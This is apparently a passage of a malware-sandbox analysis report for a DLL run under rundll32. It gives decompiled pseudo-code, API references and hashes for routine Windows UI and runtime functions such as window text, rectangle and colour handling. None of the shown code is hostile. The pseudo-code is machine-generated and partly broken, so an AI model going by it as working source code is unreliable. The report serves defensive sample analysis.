				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x100368f7
0x10036904
0x10036954
0x1003695d
0x10036966
0x1003696c
0x1003696f
0x00000000
0x1003696f
0x10036925
0x1003693f
0x00000000

APIs

IsWindow.USER32(?), ref: 100368FC
SendMessageA.USER32 ref: 10036925
SendMessageA.USER32 ref: 1003693F
InvalidateRect.USER32(?,00000000,00000001), ref: 10036948

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}

0x10036fda
0x10036fe3
0x10036fec
0x10036ffc
0x10037002
0x10037006
0x1003700a
0x10037016
0x1003701f
0x00000000
0x10037026
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 10036FEC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x10036b9d
0x10036ba4
0x10036ba7
0x10036bae
0x10036bb6
0x10036bc2
0x10036bca
0x10036bdc
0x10036bea
0x10036bf8
0x10036bfc
0x00000000
0x10036bff
0x10036bca
0x10036c03

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetParent.USER32(?), ref: 10036BBB
IsZoomed.USER32(00000000), ref: 10036BC2
GetSystemMetrics.USER32 ref: 10036BEA
GetSystemMetrics.USER32 ref: 10036BF8

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}

0x1000bfd0
0x1000bfd3
0x1000bff6
0x1000c003
0x1000bfd5
0x1000bfe0
0x1000bfe1
0x1000bfe2
0x1000bfe3
0x1000bfe5
0x1000c015
0x1000c02a
0x1000c02a
0x1000c034

APIs

IntersectRect.USER32 ref: 1000BFF6
EqualRect.USER32 ref: 1000C003
IsRectEmpty.USER32 ref: 1000C00D
InvalidateRect.USER32(?,?,?), ref: 1000C02A

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60

Uniqueness

Uniqueness Score: -1.00%

Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}

0x100214bc
0x10021521
0x00000000
0x100214c4
0x100214c4
0x100214ca
0x00000000
0x100214e7
0x100214f0
0x100214fc
0x10021502
0x10021508
0x1002150c
0x1002150c
0x10021516
0x00000000
0x1002151e
0x100214ca

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
SetBkColor.GDI32(00000000,00000000), ref: 100214FC
GetSysColor.USER32(00000008), ref: 1002150C
SetTextColor.GDI32(00000000,?), ref: 10021516

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}

0x10020964
0x10020969
0x10020971
0x10020993
0x1002099b
0x100209a2
0x100209a3
0x100209b2
0x100209bb
0x100209c9
0x100209ce
0x10020973
0x1002097c
0x1002097c
0x100209d4
0x100209dc

APIs

__EH_prolog.LIBCMT ref: 10020964
GetWindowTextA.USER32 ref: 1002097C
lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prologTextWindowlstrcpynlstrlen
String ID:
API String ID: 3022380644-0
Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}

0x1001b670
0x1001b675
0x1001b67e
0x1001b683
0x1001b688
0x1001b68a
0x1001b692
0x1001b697
0x1001b69c
0x1001b69e
0x1001b69e
0x1001b69c
0x1001b6a1
0x1001b6b4
0x1001b6b6
0x1001b6b6
0x1001b6b9
0x1001b6cc

APIs

___addl.LIBCMT ref: 1001B67E
___addl.LIBCMT ref: 1001B692
___addl.LIBCMT ref: 1001B6AA
___addl.LIBCMT ref: 1001B6C2

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}

0x10029b2c
0x10029b35
0x10029b3e
0x10029b47
0x10029b78
0x10029b78
0x10029b88

APIs

lstrlenA.KERNEL32(?), ref: 10029B38
GetWindowTextA.USER32 ref: 10029B54
lstrcmpA.KERNEL32(?,?), ref: 10029B68
SetWindowTextA.USER32(?,?), ref: 10029B78

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50

Uniqueness

Uniqueness Score: -1.00%

Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}

0x100308ef
0x100308f1
0x100308f6
0x1003090a
0x1003090c
0x10030912
0x10030918
0x1003091c
0x10030924
0x1003092a
0x00000000
0x1003092a
0x1003092f

APIs

Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D

ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
GetDesktopWindow.USER32 ref: 100308FC
LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
ReleaseDC.USER32 ref: 10030924

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}

APIs

GetCPInfo.KERNEL32(?,?), ref: 100128C3

Strings

, xrefs: 100128EA
, xrefs: 10012911

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791

Uniqueness

Uniqueness Score: -1.00%

Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
